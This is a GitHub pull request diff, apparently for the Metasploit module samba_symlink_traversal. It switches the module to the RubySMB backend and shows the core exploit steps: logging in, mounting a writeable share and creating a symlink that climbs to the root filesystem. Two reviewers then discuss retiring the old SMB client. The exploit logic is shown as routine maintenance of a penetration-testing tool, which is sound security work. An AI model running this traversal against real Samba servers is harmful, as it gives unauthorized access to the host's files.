-
Notifications
You must be signed in to change notification settings - Fork 14.9k
Update samba_symlink_traversal to use RubySMB #21383
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -50,17 +50,19 @@ def initialize | |
|
|
||
| def run | ||
| print_status('Connecting to the server...') | ||
| connect(versions: [1]) | ||
| connect(versions: [1], backend: :ruby_smb) | ||
| smb_login | ||
|
|
||
| print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...") | ||
| simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}") | ||
|
|
||
| print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...") | ||
| simple.client.symlink(datastore['SMBTARGET'], '../' * 10) | ||
| simple.client.last_tree.set_unix_link(symlink: datastore['SMBTARGET'], target: '../' * 10) | ||
|
Comment on lines
56
to
+60
|
||
|
|
||
| print_status('Now access the following share to browse the root filesystem:') | ||
| print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") | ||
| print_line('') | ||
| print_status(" \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") | ||
| rescue RubySMB::Error::UnexpectedStatusCode => e | ||
| elog(e.message, error: e) | ||
| fail_with(Failure::UnexpectedReply, e.message) | ||
| end | ||
| end | ||
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just curious how far away are we from dropping the Rex client, is that being tracked somewhere? I assume we'll refactor out the
backend: :ruby_smbonce we're fully switched over?There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's not being tracked anywhere that I'm aware of. The issue is that the remaining modules are all getting into edge cases such as this one where they either rely on functionality that RubySMB needs to have implemented or they're memory corruption vulnerabilities and we'd need likely need to test the exploits again on a live target to ensure that the RubySMB structures are equivalent to the Rex structures. My guess is this PR and the associated RubySMB PR are probably around 1/8th of the remaining work.